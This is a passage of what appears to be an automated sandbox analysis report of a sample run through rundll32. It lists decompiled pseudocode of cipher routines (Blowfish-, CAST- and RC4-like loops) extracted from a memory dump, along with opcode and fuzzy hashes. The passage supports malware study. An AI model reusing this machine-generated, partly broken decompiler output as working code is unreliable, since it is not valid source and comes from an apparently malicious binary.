                                        				r8d = r8d + 0x100;
                                        				r8d =  *(__rdx + 0x48 + __r8 * 4);
                                        				r8d = r8d +  *((intOrPtr*)(__rdx + 0x48 + (__rdx >> 0x18) * 4));
                                        				r8d = r8d ^  *(__rdx + 0x48 + __rcx * 4);
                                        				r8d = r8d +  *((intOrPtr*)(__rdx + 0x48 + __rax * 4));
                                        				r8d = r8d ^  *(__rdx + 0x40);
                                        				r8d = r8d ^  *(__rcx + 4);
                                        				_t464 = __rcx >> 0x18;
                                        				r9d = r9d ^ ( *((intOrPtr*)(__rdx + 0x48 + __rax * 4)) +  *(__rdx + 0x48 + _t464 * 4) ^  *(__rdx + 0x48 + _t464 * 4)) +  *((intOrPtr*)(__rdx + 0x48 + __rax * 4)) ^  *(__rdx + 0x3c);
                                        				_t465 = _t464 >> 0x18;
                                        				r8d = r8d ^ ( *((intOrPtr*)(__rdx + 0x48 + __rax * 4)) +  *(__rdx + 0x48 + _t465 * 4) ^  *(__rdx + 0x48 + _t465 * 4)) +  *((intOrPtr*)(__rdx + 0x48 + __rax * 4)) ^  *(__rdx + 0x38);
                                        				_t466 = _t465 >> 0x18;
                                        				r9d = r9d ^ ( *((intOrPtr*)(__rdx + 0x48 + __rax * 4)) +  *(__rdx + 0x48 + _t466 * 4) ^  *(__rdx + 0x48 + _t466 * 4)) +  *((intOrPtr*)(__rdx + 0x48 + __rax * 4)) ^  *(__rdx + 0x34);
                                        				_t467 = _t466 >> 0x18;
                                        				r8d = r8d ^ ( *((intOrPtr*)(__rdx + 0x48 + __rax * 4)) +  *(__rdx + 0x48 + _t467 * 4) ^  *(__rdx + 0x48 + _t467 * 4)) +  *((intOrPtr*)(__rdx + 0x48 + __rax * 4)) ^  *(__rdx + 0x30);
                                        				_t468 = _t467 >> 0x18;
                                        				r9d = r9d ^ ( *((intOrPtr*)(__rdx + 0x48 + __rax * 4)) +  *(__rdx + 0x48 + _t468 * 4) ^  *(__rdx + 0x48 + _t468 * 4)) +  *((intOrPtr*)(__rdx + 0x48 + __rax * 4)) ^  *(__rdx + 0x2c);
                                        				_t469 = _t468 >> 0x18;
                                        				r8d = r8d ^ ( *((intOrPtr*)(__rdx + 0x48 + __rax * 4)) +  *(__rdx + 0x48 + _t469 * 4) ^  *(__rdx + 0x48 + _t469 * 4)) +  *((intOrPtr*)(__rdx + 0x48 + __rax * 4)) ^  *(__rdx + 0x28);
                                        				_t470 = _t469 >> 0x18;
                                        				r9d = r9d ^ ( *((intOrPtr*)(__rdx + 0x48 + __rax * 4)) +  *(__rdx + 0x48 + _t470 * 4) ^  *(__rdx + 0x48 + _t470 * 4)) +  *((intOrPtr*)(__rdx + 0x48 + __rax * 4)) ^  *(__rdx + 0x24);
                                        				_t471 = _t470 >> 0x18;
                                        				r8d = r8d ^ ( *((intOrPtr*)(__rdx + 0x48 + __rax * 4)) +  *(__rdx + 0x48 + _t471 * 4) ^  *(__rdx + 0x48 + _t471 * 4)) +  *((intOrPtr*)(__rdx + 0x48 + __rax * 4)) ^  *(__rdx + 0x20);
                                        				_t472 = _t471 >> 0x18;
                                        				r9d = r9d ^ ( *((intOrPtr*)(__rdx + 0x48 + __rax * 4)) +  *(__rdx + 0x48 + _t472 * 4) ^  *(__rdx + 0x48 + _t472 * 4)) +  *((intOrPtr*)(__rdx + 0x48 + __rax * 4)) ^  *(__rdx + 0x1c);
                                        				_t473 = _t472 >> 0x18;
                                        				r8d = r8d ^ ( *((intOrPtr*)(__rdx + 0x48 + __rax * 4)) +  *(__rdx + 0x48 + _t473 * 4) ^  *(__rdx + 0x48 + _t473 * 4)) +  *((intOrPtr*)(__rdx + 0x48 + __rax * 4)) ^  *(__rdx + 0x18);
                                        				_t474 = _t473 >> 0x18;
                                        				r9d = r9d ^ ( *((intOrPtr*)(__rdx + 0x48 + __rax * 4)) +  *(__rdx + 0x48 + _t474 * 4) ^  *(__rdx + 0x48 + _t474 * 4)) +  *((intOrPtr*)(__rdx + 0x48 + __rax * 4)) ^  *(__rdx + 0x14);
                                        				_t475 = _t474 >> 0x18;
                                        				r8d = r8d ^ ( *((intOrPtr*)(__rdx + 0x48 + __rax * 4)) +  *(__rdx + 0x48 + _t475 * 4) ^  *(__rdx + 0x48 + _t475 * 4)) +  *((intOrPtr*)(__rdx + 0x48 + __rax * 4)) ^  *(__rdx + 0x10);
                                        				_t476 = _t475 >> 0x18;
                                        				r9d = r9d ^ ( *((intOrPtr*)(__rdx + 0x48 + __rax * 4)) +  *(__rdx + 0x48 + _t476 * 4) ^  *(__rdx + 0x48 + _t476 * 4)) +  *((intOrPtr*)(__rdx + 0x48 + __rax * 4)) ^  *(__rdx + 0xc);
                                        				_t477 = _t476 >> 0x18;
                                        				r8d = r8d ^ ( *((intOrPtr*)(__rdx + 0x48 + __rax * 4)) +  *(__rdx + 0x48 + _t477 * 4) ^  *(__rdx + 0x48 + _t477 * 4)) +  *((intOrPtr*)(__rdx + 0x48 + __rax * 4)) ^  *(__rdx + 8);
                                        				r8d = r8d ^  *__rdx;
                                        				r9d = r9d ^ ( *((intOrPtr*)(__rdx + 0x48 + __rax * 4)) +  *(__rdx + 0x48 + (_t477 >> 0x18) * 4) ^  *(__rdx + 0x48 + (_t477 >> 0x18) * 4)) +  *((intOrPtr*)(__rdx + 0x48 + __rax * 4)) ^  *(__rdx + 4);
                                        				 *__rcx = r8d;
                                        				 *(__rcx + 4) = r9d;
                                        				return (r8b & 0xffffffff) + 0x300;
                                        			}

                                        Memory Dump Source
                                        • Source File: 00000003.00000002.779447807.0000021EF2FE0000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021EF2FE0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_21ef2fe0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 582a7e91ac43e1a01a7d7da354588a3fd39a363a2ea9105f9677cafbafe65974
                                        • Instruction ID: 90716a120d76e616e9456c75875a24cacf7da7ca8ee00a1b0e639c8d2846dcb9
                                        • Opcode Fuzzy Hash: 582a7e91ac43e1a01a7d7da354588a3fd39a363a2ea9105f9677cafbafe65974
                                        • Instruction Fuzzy Hash: 08C1BCB662142847E384C71EC899F2933A9D799346F879219E381CBBC9E13FE54587D0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 100%
                                        			E0000021E21EF30595A0(signed int __rax, unsigned int __rcx, unsigned int __rdx, signed int __r8) {
                                        				unsigned long long _t464;
                                        				unsigned long long _t465;
                                        				unsigned long long _t466;
                                        				unsigned long long _t467;
                                        				unsigned long long _t468;
                                        				unsigned long long _t469;
                                        				unsigned long long _t470;
                                        				unsigned long long _t471;
                                        				unsigned long long _t472;
                                        				unsigned long long _t473;
                                        				unsigned long long _t474;
                                        				unsigned long long _t475;
                                        				unsigned long long _t476;
                                        				unsigned long long _t477;
                                        
                                        				r9d =  *__rcx;
                                        				r9d = r9d ^  *__rdx;
                                        				r8d = r9d >> 0x00000010 & 0x000000ff;
                                        				r8d = r8d + 0x100;
                                        				r8d =  *(__rdx + 0x48 + __r8 * 4);
                                        				r8d = r8d +  *((intOrPtr*)(__rdx + 0x48 + (__rdx >> 0x18) * 4));
                                        				r8d = r8d ^  *(__rdx + 0x48 + __rcx * 4);
                                        				r8d = r8d +  *((intOrPtr*)(__rdx + 0x48 + __rax * 4));
                                        				r8d = r8d ^  *(__rdx + 4);
                                        				r8d = r8d ^  *(__rcx + 4);
                                        				_t464 = __rcx >> 0x18;
                                        				r9d = r9d ^ ( *((intOrPtr*)(__rdx + 0x48 + __rax * 4)) +  *(__rdx + 0x48 + _t464 * 4) ^  *(__rdx + 0x48 + _t464 * 4)) +  *((intOrPtr*)(__rdx + 0x48 + __rax * 4)) ^  *(__rdx + 8);
                                        				_t465 = _t464 >> 0x18;
                                        				r8d = r8d ^ ( *((intOrPtr*)(__rdx + 0x48 + __rax * 4)) +  *(__rdx + 0x48 + _t465 * 4) ^  *(__rdx + 0x48 + _t465 * 4)) +  *((intOrPtr*)(__rdx + 0x48 + __rax * 4)) ^  *(__rdx + 0xc);
                                        				_t466 = _t465 >> 0x18;
                                        				r9d = r9d ^ ( *((intOrPtr*)(__rdx + 0x48 + __rax * 4)) +  *(__rdx + 0x48 + _t466 * 4) ^  *(__rdx + 0x48 + _t466 * 4)) +  *((intOrPtr*)(__rdx + 0x48 + __rax * 4)) ^  *(__rdx + 0x10);
                                        				_t467 = _t466 >> 0x18;
                                        				r8d = r8d ^ ( *((intOrPtr*)(__rdx + 0x48 + __rax * 4)) +  *(__rdx + 0x48 + _t467 * 4) ^  *(__rdx + 0x48 + _t467 * 4)) +  *((intOrPtr*)(__rdx + 0x48 + __rax * 4)) ^  *(__rdx + 0x14);
                                        				_t468 = _t467 >> 0x18;
                                        				r9d = r9d ^ ( *((intOrPtr*)(__rdx + 0x48 + __rax * 4)) +  *(__rdx + 0x48 + _t468 * 4) ^  *(__rdx + 0x48 + _t468 * 4)) +  *((intOrPtr*)(__rdx + 0x48 + __rax * 4)) ^  *(__rdx + 0x18);
                                        				_t469 = _t468 >> 0x18;
                                        				r8d = r8d ^ ( *((intOrPtr*)(__rdx + 0x48 + __rax * 4)) +  *(__rdx + 0x48 + _t469 * 4) ^  *(__rdx + 0x48 + _t469 * 4)) +  *((intOrPtr*)(__rdx + 0x48 + __rax * 4)) ^  *(__rdx + 0x1c);
                                        				_t470 = _t469 >> 0x18;
                                        				r9d = r9d ^ ( *((intOrPtr*)(__rdx + 0x48 + __rax * 4)) +  *(__rdx + 0x48 + _t470 * 4) ^  *(__rdx + 0x48 + _t470 * 4)) +  *((intOrPtr*)(__rdx + 0x48 + __rax * 4)) ^  *(__rdx + 0x20);
                                        				_t471 = _t470 >> 0x18;
                                        				r8d = r8d ^ ( *((intOrPtr*)(__rdx + 0x48 + __rax * 4)) +  *(__rdx + 0x48 + _t471 * 4) ^  *(__rdx + 0x48 + _t471 * 4)) +  *((intOrPtr*)(__rdx + 0x48 + __rax * 4)) ^  *(__rdx + 0x24);
                                        				_t472 = _t471 >> 0x18;
                                        				r9d = r9d ^ ( *((intOrPtr*)(__rdx + 0x48 + __rax * 4)) +  *(__rdx + 0x48 + _t472 * 4) ^  *(__rdx + 0x48 + _t472 * 4)) +  *((intOrPtr*)(__rdx + 0x48 + __rax * 4)) ^  *(__rdx + 0x28);
                                        				_t473 = _t472 >> 0x18;
                                        				r8d = r8d ^ ( *((intOrPtr*)(__rdx + 0x48 + __rax * 4)) +  *(__rdx + 0x48 + _t473 * 4) ^  *(__rdx + 0x48 + _t473 * 4)) +  *((intOrPtr*)(__rdx + 0x48 + __rax * 4)) ^  *(__rdx + 0x2c);
                                        				_t474 = _t473 >> 0x18;
                                        				r9d = r9d ^ ( *((intOrPtr*)(__rdx + 0x48 + __rax * 4)) +  *(__rdx + 0x48 + _t474 * 4) ^  *(__rdx + 0x48 + _t474 * 4)) +  *((intOrPtr*)(__rdx + 0x48 + __rax * 4)) ^  *(__rdx + 0x30);
                                        				_t475 = _t474 >> 0x18;
                                        				r8d = r8d ^ ( *((intOrPtr*)(__rdx + 0x48 + __rax * 4)) +  *(__rdx + 0x48 + _t475 * 4) ^  *(__rdx + 0x48 + _t475 * 4)) +  *((intOrPtr*)(__rdx + 0x48 + __rax * 4)) ^  *(__rdx + 0x34);
                                        				_t476 = _t475 >> 0x18;
                                        				r9d = r9d ^ ( *((intOrPtr*)(__rdx + 0x48 + __rax * 4)) +  *(__rdx + 0x48 + _t476 * 4) ^  *(__rdx + 0x48 + _t476 * 4)) +  *((intOrPtr*)(__rdx + 0x48 + __rax * 4)) ^  *(__rdx + 0x38);
                                        				_t477 = _t476 >> 0x18;
                                        				r8d = r8d ^ ( *((intOrPtr*)(__rdx + 0x48 + __rax * 4)) +  *(__rdx + 0x48 + _t477 * 4) ^  *(__rdx + 0x48 + _t477 * 4)) +  *((intOrPtr*)(__rdx + 0x48 + __rax * 4)) ^  *(__rdx + 0x3c);
                                        				r8d = r8d ^  *(__rdx + 0x44);
                                        				r9d = r9d ^ ( *((intOrPtr*)(__rdx + 0x48 + __rax * 4)) +  *(__rdx + 0x48 + (_t477 >> 0x18) * 4) ^  *(__rdx + 0x48 + (_t477 >> 0x18) * 4)) +  *((intOrPtr*)(__rdx + 0x48 + __rax * 4)) ^  *(__rdx + 0x40);
                                        				 *__rcx = r8d;
                                        				 *(__rcx + 4) = r9d;
                                        				return (r8b & 0xffffffff) + 0x300;
                                        			}

                                        Memory Dump Source
                                        • Source File: 00000003.00000002.779447807.0000021EF2FE0000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021EF2FE0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_21ef2fe0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 56b82af931801861401d1af032a20993c7c18475d91a9b4644bb39ff2e37f13e
                                        • Instruction ID: f178bc895364f4174293084b2c4f12d974863cb1f72a57913042451f8509f8ba
                                        • Opcode Fuzzy Hash: 56b82af931801861401d1af032a20993c7c18475d91a9b4644bb39ff2e37f13e
                                        • Instruction Fuzzy Hash: 27C1BDB662142847E384C71EC899F2933A9D799346F879219E381CBBC9E13FE54587D0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 78%
                                        			E0000021E21EF305BFF0(unsigned int __rax, long long __rbx, signed int __rcx, signed int* __rdx, long long __rdi, long long __rsi, unsigned int __r8, unsigned int __r9, long long _a8, long long _a16, long long _a24) {
                                        				unsigned long long _t412;
                                        				signed long long _t414;
                                        				unsigned long long _t415;
                                        				signed long long _t416;
                                        				unsigned long long _t417;
                                        				unsigned long long _t418;
                                        				signed long long _t420;
                                        				unsigned long long _t421;
                                        				signed long long _t422;
                                        				unsigned long long _t423;
                                        				unsigned long long _t424;
                                        				signed long long _t426;
                                        				unsigned long long _t427;
                                        				signed long long _t428;
                                        				unsigned long long _t429;
                                        				unsigned long long _t430;
                                        				signed long long _t432;
                                        				unsigned long long _t433;
                                        				signed long long _t434;
                                        				unsigned long long _t435;
                                        				unsigned long long _t436;
                                        				unsigned long long _t439;
                                        				signed long long _t440;
                                        				unsigned long long _t441;
                                        				unsigned long long _t458;
                                        				unsigned long long _t461;
                                        				unsigned long long _t464;
                                        				unsigned long long _t467;
                                        
                                        				_a8 = __rbx;
                                        				_a16 = __rsi;
                                        				_a24 = __rdi;
                                        				r8d =  *__rdx;
                                        				r11d =  *(__rcx + 4);
                                        				r8d = r8d + r11d;
                                        				asm("inc ecx");
                                        				r9d = r8d;
                                        				_t412 = __rax >> 8;
                                        				r8d = r8d & 0x000000ff;
                                        				r10d =  *(0x21ef2fe0000 + 0x18de00 + __r8 * 4);
                                        				r10d = r10d ^  *(0x21ef2fe0000 + 0x18e200 + _t412 * 4);
                                        				r10d = r10d +  *((intOrPtr*)(0x21ef2fe0000 + 0x18ea00 + __rcx * 4));
                                        				r10d = r10d -  *((intOrPtr*)(0x21ef2fe0000 + 0x18e600 + (__r9 >> 0x18) * 4));
                                        				r10d = r10d ^  *__rcx;
                                        				asm("rol eax, cl");
                                        				r8d = __rdx[2] ^ r10d;
                                        				_t414 = _t412 >> 0x10 >> 8;
                                        				_t415 = _t414 >> 0x18;
                                        				r11d = r11d ^  *(0x21ef2fe0000 + 0x18de00 + __rcx * 4) -  *((intOrPtr*)(0x21ef2fe0000 + 0x18e200 + _t414 * 4)) +  *((intOrPtr*)(0x21ef2fe0000 + 0x18e600 + _t415 * 4)) ^  *(0x21ef2fe0000 + 0x18ea00 + _t415 * 4);
                                        				asm("rol eax, cl");
                                        				r8d = __rdx[4] - r11d;
                                        				_t416 = _t415 >> 8;
                                        				_t417 = _t416 >> 0x18;
                                        				r10d = r10d ^ ( *(0x21ef2fe0000 + 0x18de00 + __rcx * 4) +  *((intOrPtr*)(0x21ef2fe0000 + 0x18e200 + _t416 * 4)) ^  *(0x21ef2fe0000 + 0x18e600 + _t417 * 4)) -  *((intOrPtr*)(0x21ef2fe0000 + 0x18ea00 + _t417 * 4));
                                        				asm("rol edx, cl");
                                        				r8d = __rdx[6] + r10d;
                                        				_t418 = _t417 >> 8;
                                        				_t458 = __r8 >> 0x10 >> 0x10 >> 0x18;
                                        				r11d = r11d ^ ( *(0x21ef2fe0000 + 0x18de00 + __rcx * 4) ^  *(0x21ef2fe0000 + 0x18e200 + _t418 * 4)) +  *((intOrPtr*)(0x21ef2fe0000 + 0x18ea00 + __rcx * 4)) -  *((intOrPtr*)(0x21ef2fe0000 + 0x18e600 + _t458 * 4));
                                        				asm("rol eax, cl");
                                        				r8d = __rdx[8] ^ r11d;
                                        				_t420 = _t418 >> 0x10 >> 8;
                                        				_t421 = _t420 >> 0x18;
                                        				r10d = r10d ^  *(0x21ef2fe0000 + 0x18de00 + __rcx * 4) -  *((intOrPtr*)(0x21ef2fe0000 + 0x18e200 + _t420 * 4)) +  *((intOrPtr*)(0x21ef2fe0000 + 0x18e600 + _t421 * 4)) ^  *(0x21ef2fe0000 + 0x18ea00 + _t421 * 4);
                                        				asm("rol eax, cl");
                                        				r8d = __rdx[0xa] - r10d;
                                        				_t422 = _t421 >> 8;
                                        				_t423 = _t422 >> 0x18;
                                        				r11d = r11d ^ ( *(0x21ef2fe0000 + 0x18de00 + __rcx * 4) +  *((intOrPtr*)(0x21ef2fe0000 + 0x18e200 + _t422 * 4)) ^  *(0x21ef2fe0000 + 0x18e600 + _t423 * 4)) -  *((intOrPtr*)(0x21ef2fe0000 + 0x18ea00 + _t423 * 4));
                                        				asm("rol edx, cl");
                                        				r8d = __rdx[0xc] + r11d;
                                        				_t424 = _t423 >> 8;
                                        				_t461 = _t458 >> 0x10 >> 0x10 >> 0x18;
                                        				r10d = r10d ^ ( *(0x21ef2fe0000 + 0x18de00 + __rcx * 4) ^  *(0x21ef2fe0000 + 0x18e200 + _t424 * 4)) +  *((intOrPtr*)(0x21ef2fe0000 + 0x18ea00 + __rcx * 4)) -  *((intOrPtr*)(0x21ef2fe0000 + 0x18e600 + _t461 * 4));
                                        				asm("rol eax, cl");
                                        				r8d = __rdx[0xe] ^ r10d;
                                        				_t426 = _t424 >> 0x10 >> 8;
                                        				_t427 = _t426 >> 0x18;
                                        				r11d = r11d ^  *(0x21ef2fe0000 + 0x18de00 + __rcx * 4) -  *((intOrPtr*)(0x21ef2fe0000 + 0x18e200 + _t426 * 4)) +  *((intOrPtr*)(0x21ef2fe0000 + 0x18e600 + _t427 * 4)) ^  *(0x21ef2fe0000 + 0x18ea00 + _t427 * 4);
                                        				asm("rol eax, cl");
                                        				r8d = __rdx[0x10] - r11d;
                                        				_t428 = _t427 >> 8;
                                        				_t429 = _t428 >> 0x18;
                                        				r10d = r10d ^ ( *(0x21ef2fe0000 + 0x18de00 + __rcx * 4) +  *((intOrPtr*)(0x21ef2fe0000 + 0x18e200 + _t428 * 4)) ^  *(0x21ef2fe0000 + 0x18e600 + _t429 * 4)) -  *((intOrPtr*)(0x21ef2fe0000 + 0x18ea00 + _t429 * 4));
                                        				asm("rol edx, cl");
                                        				r8d = __rdx[0x12] + r10d;
                                        				_t430 = _t429 >> 8;
                                        				_t464 = _t461 >> 0x10 >> 0x10 >> 0x18;
                                        				r11d = r11d ^ ( *(0x21ef2fe0000 + 0x18de00 + __rcx * 4) ^  *(0x21ef2fe0000 + 0x18e200 + _t430 * 4)) +  *((intOrPtr*)(0x21ef2fe0000 + 0x18ea00 + __rcx * 4)) -  *((intOrPtr*)(0x21ef2fe0000 + 0x18e600 + _t464 * 4));
                                        				asm("rol eax, cl");
                                        				r8d = __rdx[0x14] ^ r11d;
                                        				_t432 = _t430 >> 0x10 >> 8;
                                        				_t433 = _t432 >> 0x18;
                                        				r10d = r10d ^  *(0x21ef2fe0000 + 0x18de00 + __rcx * 4) -  *((intOrPtr*)(0x21ef2fe0000 + 0x18e200 + _t432 * 4)) +  *((intOrPtr*)(0x21ef2fe0000 + 0x18e600 + _t433 * 4)) ^  *(0x21ef2fe0000 + 0x18ea00 + _t433 * 4);
                                        				asm("rol eax, cl");
                                        				r8d = __rdx[0x16] - r10d;
                                        				_t434 = _t433 >> 8;
                                        				_t435 = _t434 >> 0x18;
                                        				r11d = r11d ^ ( *(0x21ef2fe0000 + 0x18de00 + __rcx * 4) +  *((intOrPtr*)(0x21ef2fe0000 + 0x18e200 + _t434 * 4)) ^  *(0x21ef2fe0000 + 0x18e600 + _t435 * 4)) -  *((intOrPtr*)(0x21ef2fe0000 + 0x18ea00 + _t435 * 4));
                                        				if (__rdx[0x20] != 0) goto 0xf305c49a;
                                        				asm("rol edx, cl");
                                        				r8d = __rdx[0x18] + r11d;
                                        				_t436 = _t435 >> 8;
                                        				_t467 = _t464 >> 0x10 >> 0x10 >> 0x18;
                                        				r10d = r10d ^ ( *(0x21ef2fe0000 + 0x18de00 + __rcx * 4) ^  *(0x21ef2fe0000 + 0x18e200 + _t436 * 4)) +  *((intOrPtr*)(0x21ef2fe0000 + 0x18ea00 + __rcx * 4)) -  *((intOrPtr*)(0x21ef2fe0000 + 0x18e600 + _t467 * 4));
                                        				asm("rol eax, cl");
                                        				r8d = __rdx[0x1a] ^ r10d;
                                        				_t439 = _t436 >> 0x10 >> 8 >> 0x18;
                                        				r11d = r11d ^  *(0x21ef2fe0000 + 0x18de00 + __rcx * 4) +  *((intOrPtr*)(0x21ef2fe0000 + 0x18e600 + _t439 * 4)) -  *((intOrPtr*)(0x21ef2fe0000 + 0x18e200 + _t439 * 4)) ^  *(0x21ef2fe0000 + 0x18ea00 + _t439 * 4);
                                        				asm("rol eax, cl");
                                        				r8d = __rdx[0x1c] - r11d;
                                        				_t440 = _t439 >> 8;
                                        				_t441 = _t440 >> 0x18;
                                        				r10d = r10d ^ ( *(0x21ef2fe0000 + 0x18de00 + __rcx * 4) +  *((intOrPtr*)(0x21ef2fe0000 + 0x18e200 + _t440 * 4)) ^  *(0x21ef2fe0000 + 0x18e600 + _t441 * 4)) -  *((intOrPtr*)(0x21ef2fe0000 + 0x18ea00 + _t441 * 4));
                                        				asm("rol edx, cl");
                                        				r8d = __rdx[0x1e] + r10d;
                                        				r11d = r11d ^ ( *(0x21ef2fe0000 + 0x18de00 + __rcx * 4) ^  *(0x21ef2fe0000 + 0x18e200 + (_t441 >> 8) * 4)) +  *((intOrPtr*)(0x21ef2fe0000 + 0x18ea00 + __rcx * 4)) -  *((intOrPtr*)(0x21ef2fe0000 + 0x18e600 + (_t467 >> 0x10 >> 0x10 >> 0x18) * 4));
                                        				 *__rcx = r11d;
                                        				 *(__rcx + 4) = r10d;
                                        				return r8d;
                                        			}
































                                        Memory Dump Source
                                        • Source File: 00000003.00000002.779447807.0000021EF2FE0000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021EF2FE0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_21ef2fe0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 2ced8dff309c0efac702c57e9b3aef14b10ba4d9a76278bd47c746b3f992d865
                                        • Instruction ID: 867143427dd99c0482f3d546a6aa0a47040b07ceccb9ffc2f3925bf00efc95c6
                                        • Opcode Fuzzy Hash: 2ced8dff309c0efac702c57e9b3aef14b10ba4d9a76278bd47c746b3f992d865
                                        • Instruction Fuzzy Hash: 89C135722202248BD765CF2DF88886A77E2F7A974D7849A04FBC657789C13DF605CB90
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 100%
                                        			E0000021E21EF3042E60(void* __ebx, long long __rbx, signed int __rcx, unsigned int __rdx, long long __rdi, long long __rsi, signed int* __r8, signed int __r9, signed int __r10, signed int __r11) {
                                        				signed char _t404;
                                        				unsigned long long _t439;
                                        				signed char* _t472;
                                        				signed int* _t476;
                                        				long long _t478;
                                        				void* _t483;
                                        
                                        				 *((long long*)(_t483 + 8)) = __rbx;
                                        				 *((long long*)(_t483 + 0x10)) = _t478;
                                        				 *((long long*)(_t483 + 0x18)) = __rsi;
                                        				 *((long long*)(_t483 + 0x20)) = __rdi;
                                        				r11d =  *__rcx;
                                        				r10d =  *(__rcx + 4);
                                        				_t439 = __rdx >> 3;
                                        				if (_t439 == 0) goto 0xf3043078;
                                        				r9d = __r11 + 0x00000001 & 0x000000ff;
                                        				r8d =  *((intOrPtr*)(__rcx + 8 + __r9 * 4));
                                        				r10d = __r8 + __r10 & 0x000000ff;
                                        				 *((intOrPtr*)(__rcx + __r9 * 4 + 8)) =  *((intOrPtr*)(__rcx + 8 + __r10 * 4));
                                        				 *((intOrPtr*)(__rcx + 8 + __r10 * 4)) = r8d;
                                        				 *__r9 =  *(__rcx + 8 + __rcx * 4) & 0x000000ff ^  *__r8;
                                        				r9d = __r9 + 0x00000001 & 0x000000ff;
                                        				r8d =  *((intOrPtr*)(__rcx + 8 + __r9 * 4));
                                        				r10d = __r8 + __r10 & 0x000000ff;
                                        				 *((intOrPtr*)(__rcx + __r9 * 4 + 8)) =  *((intOrPtr*)(__rcx + 8 + __r10 * 4));
                                        				 *((intOrPtr*)(__rcx + 8 + __r10 * 4)) = r8d;
                                        				 *(__r9 + 1) =  *(__rcx + 8 + __rcx * 4) & 0x000000ff ^ __r8[0];
                                        				r9d = __r9 + 0x00000001 & 0x000000ff;
                                        				r8d =  *((intOrPtr*)(__rcx + 8 + __r9 * 4));
                                        				r10d = __r8 + __r10 & 0x000000ff;
                                        				 *((intOrPtr*)(__rcx + __r9 * 4 + 8)) =  *((intOrPtr*)(__rcx + 8 + __r10 * 4));
                                        				 *((intOrPtr*)(__rcx + 8 + __r10 * 4)) = r8d;
                                        				 *(__r9 + 2) =  *(__rcx + 8 + __rcx * 4) & 0x000000ff ^ __r8[0];
                                        				r9d = __r9 + 0x00000001 & 0x000000ff;
                                        				r8d =  *((intOrPtr*)(__rcx + 8 + __r9 * 4));
                                        				r10d = __r8 + __r10 & 0x000000ff;
                                        				 *((intOrPtr*)(__rcx + __r9 * 4 + 8)) =  *((intOrPtr*)(__rcx + 8 + __r10 * 4));
                                        				 *((intOrPtr*)(__rcx + 8 + __r10 * 4)) = r8d;
                                        				 *(__r9 + 3) =  *(__rcx + 8 + __rcx * 4) & 0x000000ff ^ __r8[0];
                                        				r9d = __r9 + 0x00000001 & 0x000000ff;
                                        				r8d =  *((intOrPtr*)(__rcx + 8 + __r9 * 4));
                                        				r10d = __r8 + __r10 & 0x000000ff;
                                        				 *((intOrPtr*)(__rcx + __r9 * 4 + 8)) =  *((intOrPtr*)(__rcx + 8 + __r10 * 4));
                                        				 *((intOrPtr*)(__rcx + 8 + __r10 * 4)) = r8d;
                                        				 *(__r9 + 4) =  *(__rcx + 8 + __rcx * 4) & 0x000000ff ^ __r8[1];
                                        				r9d = __r9 + 0x00000001 & 0x000000ff;
                                        				r8d =  *((intOrPtr*)(__rcx + 8 + __r9 * 4));
                                        				r10d = __r8 + __r10 & 0x000000ff;
                                        				 *((intOrPtr*)(__rcx + __r9 * 4 + 8)) =  *((intOrPtr*)(__rcx + 8 + __r10 * 4));
                                        				 *((intOrPtr*)(__rcx + 8 + __r10 * 4)) = r8d;
                                        				 *(__r9 + 5) =  *(__rcx + 8 + __rcx * 4) & 0x000000ff ^ __r8[1];
                                        				r9d = __r9 + 0x00000001 & 0x000000ff;
                                        				r8d =  *((intOrPtr*)(__rcx + 8 + __r9 * 4));
                                        				r10d = __r8 + __r10 & 0x000000ff;
                                        				 *((intOrPtr*)(__rcx + __r9 * 4 + 8)) =  *((intOrPtr*)(__rcx + 8 + __r10 * 4));
                                        				 *((intOrPtr*)(__rcx + 8 + __r10 * 4)) = r8d;
                                        				 *(__r9 + 6) =  *(__rcx + 8 + __rcx * 4) & 0x000000ff ^ __r8[1];
                                        				r11d = __r9 + 0x00000001 & 0x000000ff;
                                        				r8d =  *((intOrPtr*)(__rcx + 8 + __r11 * 4));
                                        				r10d = __r8 + __r10 & 0x000000ff;
                                        				 *((intOrPtr*)(__rcx + __r11 * 4 + 8)) =  *((intOrPtr*)(__rcx + 8 + __r10 * 4));
                                        				 *((intOrPtr*)(__rcx + 8 + __r10 * 4)) = r8d;
                                        				_t476 =  &(__r8[2]);
                                        				 *(__r9 + 7) =  *(__rcx + 8 + __rcx * 4) & 0x000000ff ^ __r8[1];
                                        				_t472 = __r9 + 8;
                                        				if (_t439 != 0) goto 0xf3042ea0;
                                        				if (_t439 == 0) goto 0xf3043291;
                                        				r11d = __r11 + 0x00000001 & 0x000000ff;
                                        				r8d =  *((intOrPtr*)(__rcx + 8 + __r11 * 4));
                                        				r10d = __r8 + __r10 & 0x000000ff;
                                        				 *((intOrPtr*)(__rcx + __r11 * 4 + 8)) =  *((intOrPtr*)(__rcx + 8 + __r10 * 4));
                                        				 *((intOrPtr*)(__rcx + 8 + __r10 * 4)) = r8d;
                                        				 *_t472 =  *(__rcx + 8 + __rcx * 4) & 0x000000ff ^  *_t476;
                                        				if (_t439 == 0) goto 0xf3043291;
                                        				r11d = __r11 + 0x00000001 & 0x000000ff;
                                        				r8d =  *((intOrPtr*)(__rcx + 8 + __r11 * 4));
                                        				r10d = __r8 + __r10 & 0x000000ff;
                                        				 *((intOrPtr*)(__rcx + __r11 * 4 + 8)) =  *((intOrPtr*)(__rcx + 8 + __r10 * 4));
                                        				 *((intOrPtr*)(__rcx + 8 + __r10 * 4)) = r8d;
                                        				_t472[1] =  *(__rcx + 8 + __rcx * 4) & 0x000000ff ^ _t476[0];
                                        				if (_t439 == 0) goto 0xf3043291;
